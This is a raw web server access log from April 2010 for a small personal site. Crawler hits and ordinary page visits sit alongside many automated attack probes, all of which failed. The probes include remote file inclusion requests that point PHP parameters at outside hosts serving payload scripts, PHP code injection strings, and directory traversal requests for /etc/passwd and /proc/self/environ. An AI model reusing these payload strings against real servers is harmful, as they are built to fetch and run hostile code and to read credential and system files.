83.222.124.113 - - [22/Apr/2010:19:13:35 -0500] "GET /logs/access_log.1220054400//errors.php?error=http://ssp3.ilawa.pl/components/com_zoom/tabs/do? HTTP/1.1" 404 322 "-""Mozilla/5.0"
85.19.150.100 - - [22/Apr/2010:19:14:22 -0500] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
85.19.150.100 - - [22/Apr/2010:19:14:22 -0500] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
85.19.150.100 - - [22/Apr/2010:19:14:22 -0500] "GET /logs/access_log.1220054400%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
207.46.199.184 - - [22/Apr/2010:19:14:48 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
85.19.150.100 - - [22/Apr/2010:19:14:57 -0500] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
85.19.150.100 - - [22/Apr/2010:19:14:57 -0500] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
85.19.150.100 - - [22/Apr/2010:19:14:57 -0500] "GET /logs/access_log.1220054400%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
217.149.52.104 - - [22/Apr/2010:19:15:08 -0500] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
217.149.52.104 - - [22/Apr/2010:19:15:08 -0500] "GET /logs/access_log.1220054400%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
217.149.52.104 - - [22/Apr/2010:19:15:08 -0500] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
85.19.150.100 - - [22/Apr/2010:19:15:57 -0500] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
85.19.150.100 - - [22/Apr/2010:19:15:57 -0500] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
85.19.150.100 - - [22/Apr/2010:19:15:57 -0500] "GET /logs/access_log.1220054400//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
85.19.150.100 - - [22/Apr/2010:19:16:08 -0500] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
85.19.150.100 - - [22/Apr/2010:19:16:08 -0500] "GET /logs/access_log.1220054400//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
85.19.150.100 - - [22/Apr/2010:19:16:08 -0500] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
217.149.52.104 - - [22/Apr/2010:19:16:20 -0500] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
217.149.52.104 - - [22/Apr/2010:19:16:20 -0500] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
217.149.52.104 - - [22/Apr/2010:19:16:20 -0500] "GET /logs/access_log.1220054400//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
217.149.52.104 - - [22/Apr/2010:19:17:18 -0500] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
217.149.52.104 - - [22/Apr/2010:19:17:18 -0500] "GET /logs/access_log.1220054400//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
217.149.52.104 - - [22/Apr/2010:19:17:18 -0500] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
83.222.124.113 - - [22/Apr/2010:19:17:35 -0500] "GET /logs/access_log.1220054400//errors.php?error=http://ssp3.ilawa.pl/components/com_zoom/tabs/do? HTTP/1.1" 404 322 "-""Mozilla/5.0"
209.212.148.221 - - [22/Apr/2010:19:19:40 -0500] "GET /logs/access_log.1220054400/e404.php?DOCUMENT_ROOT=http://www.4site.net.au/1.jpg?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
209.212.148.221 - - [22/Apr/2010:19:19:40 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.4site.net.au/1.jpg?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
209.212.148.221 - - [22/Apr/2010:19:19:40 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.4site.net.au/1.jpg?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
209.212.148.221 - - [22/Apr/2010:19:20:37 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.4site.net.au/1.jpg?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
209.212.148.221 - - [22/Apr/2010:19:20:37 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.4site.net.au/1.jpg?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
209.212.148.221 - - [22/Apr/2010:19:20:37 -0500] "GET /logs/access_log.1220054400/e404.php?DOCUMENT_ROOT=http://www.4site.net.au/1.jpg?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.235.124.132 - - [22/Apr/2010:19:26:16 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""-"
66.235.124.132 - - [22/Apr/2010:19:26:17 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
67.195.112.180 - - [22/Apr/2010:19:31:16 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.71.225 - - [22/Apr/2010:19:33:21 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3957 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.19.150.100 - - [22/Apr/2010:19:34:13 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
85.19.150.100 - - [22/Apr/2010:19:34:13 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
85.19.150.100 - - [22/Apr/2010:19:34:13 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
85.19.150.100 - - [22/Apr/2010:19:34:16 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
85.19.150.100 - - [22/Apr/2010:19:34:16 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
85.19.150.100 - - [22/Apr/2010:19:34:16 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
85.19.150.100 - - [22/Apr/2010:19:34:21 -0500] "GET /logs/access_log.1270684800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
85.19.150.100 - - [22/Apr/2010:19:34:24 -0500] "GET /logs/access_log.1270684800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
217.149.52.104 - - [22/Apr/2010:19:34:39 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
217.149.52.104 - - [22/Apr/2010:19:34:39 -0500] "GET /logs/access_log.1270684800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
217.149.52.104 - - [22/Apr/2010:19:34:39 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
217.149.52.104 - - [22/Apr/2010:19:34:39 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
208.115.111.248 - - [22/Apr/2010:19:36:24 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
207.46.199.43 - - [22/Apr/2010:19:36:54 -0500] "GET /logs/access_log.1206403200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.220.193.170 - - [22/Apr/2010:19:37:01 -0500] "GET /solpot.html?body=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 295 "-""Mozilla/5.0"
211.220.193.170 - - [22/Apr/2010:19:37:01 -0500] "GET /logs/solpot.html?body=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 300 "-""Mozilla/5.0"
211.220.193.170 - - [22/Apr/2010:19:37:01 -0500] "GET /logs/access_log.1271030400/solpot.html?body=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 322 "-""Mozilla/5.0"
211.220.193.170 - - [22/Apr/2010:19:38:16 -0500] "GET /logs/access_log.1265500800/solpot.html?body=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 322 "-""Mozilla/5.0"
211.220.193.170 - - [22/Apr/2010:19:38:16 -0500] "GET /logs/access_log.1265673600/solpot.html?body=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 322 "-""Mozilla/5.0"
69.90.47.134 - - [22/Apr/2010:19:40:13 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
69.90.47.134 - - [22/Apr/2010:19:40:14 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
69.90.47.134 - - [22/Apr/2010:19:40:14 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
69.90.47.134 - - [22/Apr/2010:19:40:31 -0500] "GET /logs/access_log.1270684800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
62.67.244.33 - - [22/Apr/2010:19:41:03 -0500] "GET /logs/access_log.1270684800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 324 "-""libwww-perl/5.803"
62.67.244.33 - - [22/Apr/2010:19:41:03 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 297 "-""libwww-perl/5.803"
62.67.244.33 - - [22/Apr/2010:19:41:03 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
62.67.244.33 - - [22/Apr/2010:19:41:24 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 324 "-""libwww-perl/5.803"
207.46.13.97 - - [22/Apr/2010:19:41:25 -0500] "GET /logs/access_log.1252627200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
131.107.151.126 - - [22/Apr/2010:19:41:37 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""MSRBOT"
131.107.151.126 - - [22/Apr/2010:19:41:37 -0500] "GET /costume/ HTTP/1.0" 200 640 "-""MSRBOT"
131.107.151.126 - - [22/Apr/2010:19:41:37 -0500] "GET /CA3CA2F8BFBB7ADD HTTP/1.0" 404 288 "-""MSRBOT"
174.142.75.205 - - [22/Apr/2010:19:42:29 -0500] "GET /logs//templates/errors.php?error=http://saskatchewan.localjobshop.ca/media/id1??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
174.142.75.205 - - [22/Apr/2010:19:42:29 -0500] "GET //templates/errors.php?error=http://saskatchewan.localjobshop.ca/media/id1??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
174.142.75.205 - - [22/Apr/2010:19:42:29 -0500] "GET /logs/access_log.1220054400//templates/errors.php?error=http://saskatchewan.localjobshop.ca/media/id1??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
91.142.208.158 - - [22/Apr/2010:19:42:34 -0500] "GET //templates/errors.php?error=http://orelhas.pt/images/stories/id1??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
91.142.208.158 - - [22/Apr/2010:19:42:34 -0500] "GET /logs/access_log.1220054400//templates/errors.php?error=http://orelhas.pt/images/stories/id1??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
91.142.208.158 - - [22/Apr/2010:19:42:34 -0500] "GET /logs//templates/errors.php?error=http://orelhas.pt/images/stories/id1??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
217.70.32.2 - - [22/Apr/2010:19:47:06 -0500] "GET /logs/impex/ImpExData.php?systempath=http://hdmi.interfree.it/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
217.70.32.2 - - [22/Apr/2010:19:47:06 -0500] "GET /logs/access_log.1265068800/impex/ImpExData.php?systempath=http://hdmi.interfree.it/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
217.70.32.2 - - [22/Apr/2010:19:47:06 -0500] "GET /logs/access_log.1265673600/impex/ImpExData.php?systempath=http://hdmi.interfree.it/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
217.70.32.2 - - [22/Apr/2010:19:47:06 -0500] "GET /impex/ImpExData.php?systempath=http://hdmi.interfree.it/id1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
217.70.32.2 - - [22/Apr/2010:19:47:44 -0500] "GET /logs/access_log.1270684800/impex/ImpExData.php?systempath=http://hdmi.interfree.it/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
217.70.32.2 - - [22/Apr/2010:19:47:44 -0500] "GET /impex/ImpExData.php?systempath=http://hdmi.interfree.it/id1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
217.70.32.2 - - [22/Apr/2010:19:47:44 -0500] "GET /logs/impex/ImpExData.php?systempath=http://hdmi.interfree.it/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
72.30.161.241 - - [22/Apr/2010:19:47:46 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.161.241 - - [22/Apr/2010:19:47:46 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
125.251.103.3 - - [22/Apr/2010:19:48:33 -0500] "GET //SSI.php?sourcedir=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 292 "-""Mozilla/5.0"
125.251.103.3 - - [22/Apr/2010:19:48:33 -0500] "GET /logs/access_log.1268956800%20%20//SSI.php?sourcedir=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
125.251.103.3 - - [22/Apr/2010:19:48:33 -0500] "GET /logs//SSI.php?sourcedir=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 297 "-""Mozilla/5.0"
218.55.227.137 - - [22/Apr/2010:19:50:41 -0500] "GET /logs/access_log.1270684800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
218.55.227.137 - - [22/Apr/2010:19:50:42 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
218.55.227.137 - - [22/Apr/2010:19:50:42 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
217.70.32.2 - - [22/Apr/2010:19:52:44 -0500] "GET /logs/access_log.1265673600/impex/ImpExData.php?systempath=http://hdmi.interfree.it/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
217.70.32.2 - - [22/Apr/2010:19:52:44 -0500] "GET /logs/impex/ImpExData.php?systempath=http://hdmi.interfree.it/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
217.70.32.2 - - [22/Apr/2010:19:52:44 -0500] "GET /impex/ImpExData.php?systempath=http://hdmi.interfree.it/id1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
125.251.103.3 - - [22/Apr/2010:19:52:57 -0500] "GET /logs///index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
125.251.103.3 - - [22/Apr/2010:19:52:57 -0500] "GET ///index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
125.251.103.3 - - [22/Apr/2010:19:52:57 -0500] "GET /logs/access_log.1220054400%20%20///index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
217.70.32.2 - - [22/Apr/2010:19:53:45 -0500] "GET /impex/ImpExData.php?systempath=http://hdmi.interfree.it/id1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
217.70.32.2 - - [22/Apr/2010:19:53:45 -0500] "GET /logs/impex/ImpExData.php?systempath=http://hdmi.interfree.it/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
217.70.32.2 - - [22/Apr/2010:19:53:45 -0500] "GET /logs/access_log.1270684800%20%20/impex/ImpExData.php?systempath=http://hdmi.interfree.it/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
207.46.199.182 - - [22/Apr/2010:19:53:48 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
213.189.224.16 - - [22/Apr/2010:19:54:15 -0500] "GET /logs//wp-content/plugins/wp-lytebox/main.php?pg=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
213.189.224.16 - - [22/Apr/2010:19:54:15 -0500] "GET /logs/access_log.1265760000//wp-content/plugins/wp-lytebox/main.php?pg=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 350 "-""Mozilla/5.0"
213.189.224.16 - - [22/Apr/2010:19:54:15 -0500] "GET //wp-content/plugins/wp-lytebox/main.php?pg=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 323 "-""Mozilla/5.0"
213.189.224.16 - - [22/Apr/2010:19:54:24 -0500] "GET /logs//wp-content/plugins/wp-lytebox/main.php?pg=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
213.189.224.16 - - [22/Apr/2010:19:54:24 -0500] "GET //wp-content/plugins/wp-lytebox/main.php?pg=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 323 "-""Mozilla/5.0"
213.189.224.16 - - [22/Apr/2010:19:54:24 -0500] "GET /logs/access_log.1265760000//wp-content/plugins/wp-lytebox/main.php?pg=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 350 "-""Mozilla/5.0"
74.63.216.245 - - [22/Apr/2010:19:55:53 -0500] "GET /logs/index2.php?DoAction=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
74.63.216.245 - - [22/Apr/2010:19:55:53 -0500] "GET /index2.php?DoAction=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
125.251.103.3 - - [22/Apr/2010:19:56:03 -0500] "GET ///index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.65"
207.46.13.44 - - [22/Apr/2010:19:56:24 -0500] "GET /logs/access_log.1186272000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
125.251.103.3 - - [22/Apr/2010:19:56:50 -0500] "GET /logs/access_log.1219708800///index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.65"
125.251.103.3 - - [22/Apr/2010:19:56:50 -0500] "GET ///index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.65"
125.251.103.3 - - [22/Apr/2010:19:56:51 -0500] "GET /logs///index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.65"
67.186.152.146 - - [22/Apr/2010:19:58:14 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com/search?hl=en&source=hp&q=Bert+Grimm+tattoo+flash&aq=f&aqi=&aql=&oq=&gs_rfai=""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
67.186.152.146 - - [22/Apr/2010:19:58:14 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
67.186.152.146 - - [22/Apr/2010:19:58:15 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
67.186.152.146 - - [22/Apr/2010:19:59:22 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
67.186.152.146 - - [22/Apr/2010:19:59:22 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
67.186.152.146 - - [22/Apr/2010:19:59:22 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
67.186.152.146 - - [22/Apr/2010:19:59:22 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
67.186.152.146 - - [22/Apr/2010:19:59:22 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
67.186.152.146 - - [22/Apr/2010:19:59:22 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
67.186.152.146 - - [22/Apr/2010:19:59:22 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
67.186.152.146 - - [22/Apr/2010:19:59:22 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
67.186.152.146 - - [22/Apr/2010:19:59:22 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
67.186.152.146 - - [22/Apr/2010:19:59:22 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
67.186.152.146 - - [22/Apr/2010:19:59:22 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
